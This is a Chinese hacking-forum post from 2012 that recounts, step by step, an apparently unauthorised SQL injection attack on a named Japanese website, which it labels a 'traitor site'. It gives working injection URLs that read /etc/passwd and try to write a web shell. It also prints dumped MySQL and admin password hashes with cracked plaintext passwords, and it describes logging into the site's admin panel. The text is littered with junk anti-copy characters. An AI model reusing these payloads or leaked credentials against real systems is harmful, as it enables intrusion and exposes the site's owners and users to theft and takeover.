找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创 检测汉奸站全过程
返回列表 发新帖
查看: 4282|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
xiancda
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试
+ G  u4 q( Z  e! _; c% v
5 s5 N' r% R4 T; Y1 x0 `
0x01. 检测 www.zuaa.jp 收集数据
+ y0 U4 Z- o: s. }4 G) z" N8 O+ Z" _; }; l( N! t3 _8 a

; ?4 E7 c  I& o0 C. x% s( L% x0 Zwhatweb) e0 Z; Q* j9 ~( l* A' j  s

+ j, j/ `/ R, a5 n2 p" ^& \) R' R1 R& V9 |0 s3 a/ B2 }) ^* r% D( K
利用NMAP扫描* L/ }2 W! Z+ O0 I9 `

6 t" E# j* a7 M5 ^中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持# F9 q6 {4 B$ q+ G- A- \& p9 T2 J
0x02.找注入点2 S8 K& r- U0 r" `$ |
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
$ k# l' a' p3 p
! R# p: q9 ]- N7 V1 Z
! t1 ^" a. ]+ V# S( x, B0x03.order by3 E' r, D5 L$ C; T. {" b' ~1 s/ \1 _
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1) z9 q& d( Z) t) F, f% f) h/ V
3 A2 ~1 D1 W- u
order by 28报错,order by 27正常
; A8 R# P  I5 U& U! u9 i* Q# P. i) j6 P# i4 v: \: s2 _$ c
0x04.   union手动查询
! s/ z  m. v9 O* D# Phttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 3 U, Z2 c, m, R+ E7 z- b8 F0 ]+ i0 e
添加到 27 时正常显示
  [+ a) Y* m  V# W: v! z: g7 n. L. \% c' a) U
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
% X( X! i. ~/ x7 Y2 u
3 s- a/ u3 K* j+ Z0x05. info:9 X1 m; {4 l6 g) z
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ; a  F+ g" T% a; A# ?8 z# K
+ ^1 r/ b" z3 _. {3 Z, ^  Y
user:            root@localhost
, C9 @# E7 n) T  t# P) ]% O0 jdatabase:    openpne3 Q/ ~! E% ]' u4 W) q5 u
version:      4.1.22$ F8 M0 l( v% `3 Q4 f% _
os:             portbld-freebsd5.4/ S4 x9 i4 R* ?2 C0 D4 ~& N% h

) `: t) P6 ~2 {% O7 o& |0x06. root用户
; K/ r/ q( L  m. W9 p利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)8 c& _* K( y: t1 j6 p( ?; L
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
, f3 {/ o- l- e9 Y4 U
+ g) x, s4 s/ b* ?9 p$ n% C通过工具转换
( |9 b0 M% F% m3 j  R
) \! F4 O5 l1 |; |7 |2 M中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
' e8 n  ^, j, W9 c: J* c. R/ r& g2 Y. E/ {; v0 s, H: g
0x07. 利用 into outfile/ e$ c. Z8 ~5 q
全部都失败, l( L4 v3 R9 Q% [' ~
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
0 Z) b6 R( S5 \' D5 i+ ?  }
: n; i# W# `3 w$ @http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
1 {- h+ b1 n8 `) v5 x1 _
* `( G% J$ G: h* H+ t3 p页面显示“MDB2 Error:syntax error”  |/ d  z' a/ C4 M
2 Y$ R. J8 r# Z$ M- K
0x08. 利用 mysql 4.1
. V4 v: N0 q$ \' Q猜常规表名,字段未果 工具 sqlmap8 o& {$ n. g8 K  ^+ I8 m
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
9 Y5 B& V: Q4 B
) }) t( z# W1 Z( p3 ^) ~# a/ x" @( _) H! t* B- H
, }5 p6 k: O8 `- h& X3 d2 Q! K( L
0x09. 查找后台
  f+ D' t5 k5 S3 @利用 现有的各种 后台工具尝试都不行! X+ q4 o) |; S, B
  O; {$ v, ~: X
0x10.  MySL外联方法) p& a( P1 v# G% c& v' t, x9 S  @- _4 X
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行/ A$ O$ Q/ a9 a0 a4 S$ ~
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user" Q" `2 Q0 {, J/ h
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user0 z" }0 j% v& p1 @; Q: H4 h& e
. J9 ~2 o9 N' u6 A/ k8 G- v" P
这个可以在 www.cmd5.com 解密3 H3 q$ P, V" n$ y7 V0 u- \+ Y
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa20091 W8 A  `& u5 A6 z. D7 K) \
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
, \4 F, n8 h; N" dopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
& [8 U+ _4 Y* ]$ i  w2 Dzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
# a: w( i* ~3 ~) @# c工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
+ S8 ~; v7 d( f1 w# u4 W: I! g# B. h$ J5 o

; G) t0 A* D- ]* t' Q* \0x11. 网站突破. S  P% g$ [: C0 k' d0 w; \
发现网站的源程序 openpne, google 下载 openpne 源码2 {, X8 R$ @. V% t  O# W6 h1 m2 S

' ^1 F+ r! q( N- H! H( p& o
8 R, U: F5 k2 _$ J; p5 F# m9 J( I0x12. 默认信息利用! O" X3 B9 H7 ?% A3 x. I1 T
http://sns.zuaa.jp/?m=admin&a=page_login' L. x5 x% U+ d' A
7 _; C  @. d  {, i0 p8 }
表名 (c_admin_user) ,字段名(username,password)
3 A: l  a# [. q* Y7 o: ^8 Rhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user' P, f9 k7 z, X# O9 ]5 N

7 M9 D6 O% [5 H/ o解密1 I+ w: @! ]" J# i2 g% _( n, g
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
+ v  b" \" _- f- nzuaajp:c0923ec5857796a393da99905008c176,          zju1897
* j# o1 \: N0 r: d% ^4 W) w4 f8 X- p# r4 f3 A8 A0 ?8 r
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
; K, D; \: s# u+ M/ D- V& x" W0 }) D1 N. G- G# K/ {$ t
0x13. 登录后台
* c  j, d- D4 v9 H
  {5 h) @" Q7 D7 @" s: [1 q9 |& T5 z% ~* i
/ V: _2 K& H0 {$ b) s
0x14. 小结
5 |# O$ D6 q; E+ b) K利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
. E: ~1 Q, B! \) C5 y感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点. [1 }" q/ j9 d* q& _& C: V
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain- [7 b6 X/ r" E- i4 }& A
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持; b* w( W6 [+ A# N

! j) F$ u; |4 ~! T3 X最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
, E3 ]! R, d+ A; B

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

荒村狂客
沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表